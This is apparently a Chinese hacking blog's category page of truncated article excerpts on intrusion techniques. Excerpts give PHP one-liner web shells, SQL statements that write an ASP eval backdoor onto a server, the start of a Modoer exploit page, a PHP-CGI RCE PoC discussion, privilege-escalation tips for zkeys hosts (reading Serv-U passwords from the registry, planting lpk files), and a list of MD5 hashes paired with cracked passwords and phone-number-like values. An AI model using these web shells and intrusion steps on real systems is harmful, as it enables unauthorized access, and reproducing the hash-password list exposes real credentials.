首页 分类网络安全

杰奇CMS漏洞

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下。 整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合SQL语句,再带入到jieqimysqldatabase类(\lib\database\mysql\db.php)的query方法进行最后的执行。 仔细查看后发现不可利用,因为如果是数字型的变量,带入到database.php时会进...

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。 那么利用它能做什么呢?我给出如下两个RCE的PoC方案: 1...

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET[‘input’]); ?> http://192.168.247.133:81/shell.php?input=dir   ““”执行命令 “执行命令等价于shell_exec()函数来执行命令。 <?php echo`$_GET[input]`; ?> http://192.168.247.133:81/shell.php?input=dir 再来个更短的 <?=@`$_GET[c]`?> http://192.168.247.133:81/shell.php?c=dir 注...

删除、恢复wscript.shell

由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。   恢复wscript.shell   建议如果真的为了安全一定要删除这些!   下面给出卸载和删除的方法   卸载wscript.shell对象,在cmd下或直接运行: regsvr32 /u %windir%system32WSHom.Ocx   卸载FSO对象,在cmd下或直接运行: regsvr32.exe /u %windir%system32scrrun.dll   卸载stream对象,在cmd下或直接运行: regsvr32 /s /u “C:ProgramFilesCommonFilesSy...

利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤 第一句代码 create table cmd (a varchar(50)) 第二句代码 insert into cmd (a) values (‘<%evalrequest(“qing520”)%>’) 第三句代码 select * into [a] in ‘d:wwwrootwjqcadadmin163Databackupx.asp;x.xls’ ‘excel 4.0;’ ...

问题ewebeditor编辑器突破安全狗

 题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?         1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。         2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。     当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。  &n...

个人收藏的部分收费MD5!

MD5 HASH 84c45962d887564f a66abb5684c45962d887564f08346e8d admin123456 8a1929f5878b794b fbbf0df68a1929f5878b794bbc290f8e 0523213511 fd51ac9e0f2262e4 8720e806fd51ac9e0f2262e47c4e7ddf 06605528808 353acf6cc57272db f58745da353acf6cc57272db3134df7a 123654913 b55ff55babafbacb 87a1c784b55ff55babafbacbb628f089 13081722883 c62400c060a48312 67c2ddd7c62400c060a483124a8a27de 13473601320 104e084da292f200 0aabef17104e084da292f2006cbd7d0e 15001088761 253750c9e9c99fe1 a361e4d6253750c9e9c99fe1e3cf8c8a 1597408...

找回系统文件夹选项 文件扩展名办法

黑阔们往往去网吧的时候无法找到文件扩展名选项很伤脑筋 下面的两种办法足矣对付!   找回系统文件夹选项: 方法一:组策略 点击“开始→运行”,在运行对话框中输入“gpedit.msc”命令,点击“确定”按钮后,弹出“组策略”编辑对话框,依次展开“本地计算机策略→用户配置→管理模板→Windows组件→Windows资源管理器”,然后在右侧窗口中找到“从‘工具’菜单删除‘文件夹选项’菜单”选项,鼠标双击打开该选项,在属性对话框中切换到“设置”标签页,你会发现该属性选项已选中了“已启用”单选项,所以屏蔽了“文件夹选项”。这时你只要把该选项设置...

PHP 5.4 内置web服务器

PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的PHP特征,不想就为此安装、启动Apache服务。 但据官方文档上说,这个内置的Web服务器只是提供开发测试使用,不推荐使用中生产环境中。因为这个服务器接受处理请求时...

Modoer Exp

源码: <html> <head> <title> Modoer EXP </title> <meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ /> </head> <script language=”javascript”> function expstart() { var url = document.forms[0].url.value; if(url != “”){ if(url.search(“http://”) < 0 && url.search(“https://”) < 0){ ...

zkysoft主机提权方法

zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。 提供我成功过的几个方法(不一定有效): 1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINESOFTWAREcat softserv-u 2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkeys 装了,有的没装,如果找到这东西直接去他目录写个 shell,权限就比之前大了,exp 也能提了。 我碰到的几个都是在 d:winwebmailweb 只要有这东西就好办,可以写 lpk,或者替换里面的 exe 啥的都行。 3、如果有 serv...